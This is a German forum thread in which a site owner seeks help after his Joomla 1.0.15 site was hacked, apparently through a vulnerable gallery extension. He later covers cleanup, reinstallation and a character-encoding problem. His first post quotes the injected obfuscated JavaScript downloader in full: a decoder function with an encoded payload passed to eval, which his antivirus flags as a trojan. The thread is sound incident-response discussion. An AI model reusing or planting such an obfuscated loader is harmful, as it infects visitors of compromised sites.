Thema: Joomla gehackt, schleust Viren ein

Hallo zusammen,

ich habe eine Joomla 1.0.15 Seite am laufen, die offensichtlich gehackt wurde!
Wenn man mit dem Internet Explorer das Backend ansurft, kommt eine Meldung Add-On: “Remote Data Services Data Control” von “Microsoft Corporation” ausführen?
Gleichzeitig öffnet sich mein Virenscanner (Bitdefender 2009) und meldet die Viren:

Trojan.Downloader.JS.Agent.MS
und
Trojan.Script.4302

in den Temporary Internet Files.

Wenn ich mir den Quelltext des Joomla Backends ansehe, fällt mir auf, dass im <body> Tag eine Veränderung vorgenommen wurde:

HTML-Code:

<body onload="setFocus();"><script language=JavaScript>function szobn15(p)	{ var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,59,54,27,15,28,7,51,17,56,0,0,0,0,0,0,55,11,25,33,8,16,3,62,42,57,39,36,13,61,29,30,10,4,35,44,38,9,32,46,45,22,0,0,0,0,0,18,0,12,53,60,14,21,50,52,43,58,24,26,41,49,47,37,1,20,40,23,31,19,5,34,2,6,48);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(176^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}szobn15('6JX@q0MmOdam8u5mF@9og0X@etIwq0Mgv@NbOuSJ6A52QsLTsfj2YA5gNsLKO6N@e@rg_F9CEdSzu@rKjuamZh9JtONgQsLCu7N2unMzOiNbQ0UmtG9o32tgQRXJx0NmOuLTM6Lmj1lz81Lbt@LTBHUwUyjVBWIo_ALV6OITsPUK6JLbQRNRpd9VEwNbBtL2Q@rC6xIzQJa@e@rKqJMzZ7NgUhr@t1Nb_iDRtTXbx6N@e19oBx')</script>

Was denkt ihr wo die Schwachstelle steckt? Ist das ein bekannter Hack?
Was soll ich am besten tun? Neuinstallation, oder gezielt nach der gehackten Datei suchen?

Danke und Gruß
Jörg

Zitat von cybergurk

Hallo,
eventl. das das problem? Nutzt du welchen editor?
http://www.joomlaportal.de/sicherhei...ro-editor.html
ansonsten kann es an so vielen liegen, alte NICHT aktuelle compos usw.. eben forschen gehen bitte. Ansonsten alles löschen Backup einspielen (haste hoffentlich ) und dann NEIN vorher sich schlau machen über deine Installierten Erweiterungen ob es updates gibt , viel Arbeit

Hi,

dank euch erstmal. ich habe nur den Standard Tiny MCE installiert, sonst keinen anderen Editor.

Zur Suche: über die geannten Viren und das eingeschleuste Script konnte ich hier im Forum nichts finden.

Was ich gesehen habe, ich nutze die Zoom Media Gallery 2.5.1 RC4 ... laut http://docs.joomla.org/Vulnerable_Extensions_List ist diese anfällig, vielleicht kam der Angriff darüber?

Könnt ihr mir einen Tipp geben wie ich die Datei finden kann, die korrupiert ist? Oder könnte das auch in der Datenbank stecken? Dann wäre eine Neuinstallation ja nicht von Erfolg gekrönt :(

Gruß Jörg

Hallo nochmal,

ich habe einiges herausfinden können:

Im Ordner /images gibt es eine index.html Datei, die den Schadecoce "<html><body bgcolor="#FFFFFF"><script language=JavaScript>function szobn15(p) .............." enthält.
Weiterhin wurde die Datei /administrator/index3.php modifiziert...

Weiterhin habe ich das Tool j-diagnostics ausgeführt. Dies zeigt mir aber bei fast jeder Datei an "File is corrupted or has been altered"... das kann ja nicht sein, oder?

Wie kann ich denn herausfinden, ob noch mehr Dateien korrupt sind, und ist es wahrscheinlich, dass auch Schadcode in der Datenbank vorhanden ist? Nach was muss ich denn da suchen?
Ich würde ja gern die Seite komplett neu installieren und absichern und dann die Datenbank zurückspielen. Aber ich weiß ja nicht ob das letzte Backup der DB auch schon Schadcode enthält???

Danke im Voraus für eure Hilfe.

Gruß Jörg

HI,

Zoom spiele ich nicht mehr ein...
Habe jetzt joomla komplett neu aufgesetzt und die DB-Sicherung ohne die Zoom-Tabellen zurückgespielt. Sieht soweit gut aus, kein Schadcode mehr zu finden bisher... hatte wohl Glück, dass die Datenbank nicht verseucht war.

Gruß Jörg

Hätte noch eine Frage:
nach dem Rückspielen der Datenbanksicherung mittels phpMyAdmin sind nun alle Umlaute der Seite nicht mehr lesbar.
Bei den Joomla Menüs habe ich sie einfach neu eingetippt und gut war. Komischerweise waren aber nur Menüs und Komponenten und Module betroffen. Im Content blieb alles ok...

Habe jetzt alles händisch korrigert, nur hier habe ich noch Probleme:
http://www.crmtransfer.de/index.php?...d=46&Itemid=63

Hier sind die Umlaute beim Satz "Füllen Sie dass Formular aus und klicken den 'Prüfen' Button." bei westlicher Codierung futsch. Wenn ich den Browser auf UTF-8 stelle, wird es korrekt angezeigt.
Vor der Rücksicherung war dies allerdings nicht so... könnt ihr mir sagen woran das liegen kann bzw. wie ich die Darstellung der Umlaute auch auf westlicher Codierung richtig einstellen kann?

Danke und Gruß
Jörg